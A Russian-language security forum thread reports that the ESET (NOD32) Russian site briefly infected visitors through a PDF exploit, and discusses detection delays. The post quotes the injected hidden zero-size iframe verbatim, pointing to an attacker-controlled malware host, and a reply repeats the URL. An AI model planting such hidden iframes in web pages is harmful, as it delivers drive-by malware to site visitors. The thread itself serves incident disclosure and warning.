-
Сайт антивируса NOD32 заражал посетителей троянами
Главная страница сайта российского представительства антивирусной компании ESET какое-то время представляла опасность для посетителей. Судя по сообщению хабраюзера Dizel Generator, при посещении этой странички в браузере Opera, открылся некий PDF-файл, после чего произошла попытка запуска странного исполняемого файла.
В случае с данным пользователем попытка заражения его компьютера не удалась, благо у него стояла защита в виде файервола. Однако, судя по всему, попытка эта основывалась на эксплуатации одной из уязвимостей PDF-файлов. В коде страницы при этом был обнаружен скрытый iframe, откуда на компьютеры пользователей внедрялся, а потом и запускался вредоносный код.
Примечательно, что изначально, т.е. по крайней мере с 19 ноября, антивирусный продукт компании ESET, NOD32, эту заразу не распознавал. Судя по обсуждению данной проблемы на официальных форумах ESET, антивирус Касперского идентифицировал её как Trojan-Downloader.Java.Agent.ab (сигнатура добавлена в базу "Лаборатории Касперского" 18 ноября).
В базы NOD32 новый троян был добавлен в течение суток после того, как Dizel Generator сообщил о своей находке в форуме. Однако сайт какое-то время после этого так и оставался зараженным. Сейчас вредоносный код с его страниц уже убран, сервис Unmask Parasites определяет этот ресурс как "чистый".
http://www.webplanet.ru/news/securit...et_trojan.html
скрытый фрейм висевший 2 дня:
</body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe>
</html
http://www.virustotal.com/ru/analisi...fac-1258711260
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Ну нифига себе прикол...раньше был уверен, что уж на сайты антивирусов можно заходить без опасения. Значит никому нельзя доверять. Все врут, как говорит хаус)
-
Сообщение от
craftix
Все врут, как говорит хаус
И он таки прав 
Left home for a few days and look what happens...
-
-
хttp://newiframe.com/s/in.cgi?6
Позавчера такой же iframe висел на _http://naviny.by/, уже убрали. Ладно белорусские новости, но сайт антивируса... Хорошая реклама для НОДа.
Ответить с цитированием
